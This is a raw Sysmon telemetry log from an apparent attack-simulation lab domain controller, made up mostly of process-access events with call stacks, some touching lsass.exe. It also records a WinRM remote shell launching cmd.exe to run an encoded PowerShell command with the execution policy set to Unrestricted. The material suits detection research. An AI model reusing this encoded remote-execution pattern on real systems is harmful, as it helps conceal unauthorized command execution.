15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002735Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002734Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002733Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002732Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C62-5FA1-0500-000000008801}644804C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-8200-000000008801}2312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002731Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C99-5FA1-8000-000000008801}43722516C:\Windows\system32\WinrsHost.exe{D28789B6-7C99-5FA1-8200-000000008801}2312C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fa39|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+6114b|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+4fecd|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+6d9f9|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+5219e|C:\Windows\System32\RPCRT4.dll+25357|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b 154100x80000000000000002730Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.755{D28789B6-7C99-5FA1-8200-000000008801}2312C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand dwBoAG8AYQBtAGkAC:\Users\Administrator\ATTACKRANGE\Administrator{D28789B6-7C99-5FA1-C621-050000000000}0x521c60HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{D28789B6-7C99-5FA1-8000-000000008801}4372C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x80000000000000002729Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002728Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.753{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002727Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.737{D28789B6-7C62-5FA1-0B00-000000008801}868992C:\Windows\system32\lsass.exe{D28789B6-7C64-5FA1-1500-000000008801}1336C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002726Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.737{D28789B6-7C64-5FA1-1500-000000008801}13361656C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-8000-000000008801}4372C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\winrscmd.dll+8d36|C:\Windows\system32\winrscmd.dll+92d5|C:\Windows\system32\winrscmd.dll+af31|C:\Windows\system32\winrscmd.dll+23dc|c:\windows\system32\wsmsvc.dll+155ac7|c:\windows\system32\wsmsvc.dll+13f76d|c:\windows\system32\wsmsvc.dll+13f3cf|c:\windows\system32\wsmsvc.dll+13fcb2|c:\windows\system32\wsmsvc.dll+9ab10|c:\windows\system32\wsmsvc.dll+9b611|c:\windows\system32\wsmsvc.dll+4495|c:\windows\system32\wsmsvc.dll+16816c|c:\windows\system32\wsmsvc.dll+1689b8|c:\windows\system32\wsmsvc.dll+16345b|c:\windows\system32\wsmsvc.dll+163125|c:\windows\system32\wsmsvc.dll+14ce9c|c:\windows\system32\wsmsvc.dll+130049|c:\windows\system32\wsmsvc.dll+13571a|c:\windows\system32\wsmsvc.dll+12f47e|c:\windows\system32\wsmsvc.dll+125587|c:\windows\system32\wsmsvc.dll+11f562|c:\windows\system32\wsmsvc.dll+124574 10341000x80000000000000002725Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.737{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-8000-000000008801}4372C:\Windows\system32\WinrsHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002724Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C99-5FA1-8100-000000008801}50964368C:\Windows\system32\conhost.exe{D28789B6-7C99-5FA1-8000-000000008801}4372C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002723Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C62-5FA1-0500-000000008801}6442444C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-8100-000000008801}5096C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002722Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002721Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002720Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002719Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002718Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002717Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002716Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002715Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002714Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081076C:\Windows\system32\svchost.exe{D28789B6-7C73-5FA1-2F00-000000008801}2152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+610fc|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002713Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C62-5FA1-0500-000000008801}6442432C:\Windows\system32\csrss.exe{D28789B6-7C99-5FA1-8000-000000008801}4372C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002712Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.721{D28789B6-7C64-5FA1-0C00-000000008801}6081120C:\Windows\system32\svchost.exe{D28789B6-7C99-5FA1-8000-000000008801}4372C:\Windows\system32\WinrsHost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|c:\windows\system32\rpcss.dll+35069|c:\windows\system32\rpcss.dll+3a852|C:\Windows\System32\RPCRT4.dll+78603|C:\Windows\System32\RPCRT4.dll+2e43b|C:\Windows\System32\RPCRT4.dll+6213a|C:\Windows\System32\RPCRT4.dll+52734|C:\Windows\System32\RPCRT4.dll+5164d|C:\Windows\System32\RPCRT4.dll+51efb|C:\Windows\System32\RPCRT4.dll+2552c|C:\Windows\System32\RPCRT4.dll+259ac|C:\Windows\System32\RPCRT4.dll+1122c|C:\Windows\System32\RPCRT4.dll+12a8b|C:\Windows\System32\RPCRT4.dll+1efba|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002711Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 15:51:53.722{D28789B6-7C99-5FA1-8000-000000008801}4372C:\Windows\System32\winrshost.exe10.0.14393.0 (rs1_release.160715-1616)Host Process for WinRM's Remote Shell pluginMicrosoft® Windows® Operating SystemMicrosoft Corporationwinrshost.exeC:\Windows\system32\WinrsHost.exe -EmbeddingC:\Windows\system32\ATTACKRANGE\Administrator{D28789B6-7C99-5FA1-C621-050000000000}0x521c60HighMD5=F40EC96CA18D88CB1F26FA2070010714,SHA256=607C014A3CA531FFAD50BCD90095C01E4E6B691D9E18473C70E4699CF1E31453,IMPHASH=4216D8E7F36901B61DFD6309B49BCF96{D28789B6-7C64-5FA1-0C00-000000008801}608C:\Windows\System32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch 10341000x80000000000000002710Microsoft-Windows-Sysmon/Operationalwin-dc-807.attackrange.local-2020-11-03 